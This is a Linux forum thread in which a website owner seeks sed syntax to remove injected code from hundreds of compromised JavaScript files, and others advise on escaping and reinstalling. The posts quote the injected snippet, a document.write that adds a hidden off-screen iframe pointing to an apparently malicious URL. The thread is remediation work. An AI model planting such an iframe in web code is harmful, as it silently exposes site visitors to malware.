Find the answer to your Linux question:
Page 1 of 2 1 2 LastLast
Hi all, this is what I'm trying for two days now. The code below was injected into about 300 . js -files on my website. I got a list of ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
    Just Joined!

The sed challenge - trying to clean up code injection

Hi all,

this is what I'm trying for two days now.

The code below was injected into about 300 .js-files on my website. I got a list of infected files, I got a linux box, but Im lacking the skill. All the internet couldn't be of any help so far.

Code:
    ;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="a-url-that-i can-not-post"></iframe>');
    My script reads the file names form a list and applies the sed-command. So the main challenge as I see it is to escape the single and double quotes. I failed so far to make a sed statement work.

Please help, I'm really desperate and reall don't want to do it all manually. Thank you all in advance!

Linux Newbie
    This thread looks like it has the right idea.
    Programming and other random guff: cat /dev/thoughts > blogspot.com (previously prognix.blogspot.com)

Just Joined!
    Thank you for your answer. Been there already and couldn't get my head around it. Yet, I'll give it another try. Nevertheless, any help help is appreciated.

The problem with a compromised host is, that you dont know for sure what else has been modified.
    So I would suggest a reinstall of the machine and a new deploy of this website from a trusted source: ie backup or revision control.
    You must always face the curtain with a bow.

Linux Newbie
    hi,

as you can't efficiently escape single quote , go with double quotes, and escape them in the pattern
    Code:
    sed "s/some\"expressions\" have 'got' double quotes/substitution/" file1 file2 file_n

Just Joined!
    Basically you're right and i share your opinion. The website is hosted by a provider and i have only confixx access, so all i could do is a complete Joomla install. Still trying to avoid this...

Just Joined!
    Ok, this is what I've tried (for the 103rd time, I guess...)

Code:
    sed "d/;document\.write\('<iframe width=\"50\" height=\"50\" style=\"width:100px;height:100px;position:absolute;left:-100px;top:0;\" src=\"http:some url"><\/iframe>'\);/g"
    Error message in terminal:
    sed: -e Ausdruck #1, Zeichen 2: Zusätzliche Zeichen nach dem Befehl

which translates into:
    sed: -e expression #1, Character 2: Additional Characters trailing the command

Any ideas welcome!

Linux Newbie
    d goes at the end,
    g is useless,
    parenthesis should not be escaped.

Just Joined!
    This is the edited codeline, according to your suggestion:

Code:
    sed "/;document\.write('<iframe width=\"50\" height=\"50\" style=\"width:100px;height:100px;position:absolute;left:-100px;top:0;\" src=\"http:\/\/hsuvmht\.freewww\.info\/55965feab821e9e8815792a6d42f565c\.cgi\?8\"><\/iframe>');/d"
    It runs without error, and also without the desired result. The pattern seems not to match. Still too many escapes?

drl
    Saint Paul, MN, USA / CentOS, Debian, Slackware, {Free, Open, Net}BSD, Solaris
    Hi.

The shell interprets many special characters. So when sed/awk/perl program-commands are coded on the command line, misery with quoting often ensues.

If I were doing this, I would place the commands in a separate file and have sed/awk/perl read the file of commands without the shell intervention. For sed, see the man page and read about option -f, then experiment.

Best wishes ... cheers, drl
    Welcome - get the most out of the forum by reading forum basics and guidelines: click here.
    90% of questions can be answered by using man pages, Quick Search, Advanced Search, Google search, Wikipedia.
    We look forward to helping you with the challenge of the other 10%.
    ( Mn, 2.6.n, AMD-64 3000+, ASUS A8V Deluxe, 1 GB, SATA + IDE, Matrox G400 AGP )

Page 1 of 2 1 2 LastLast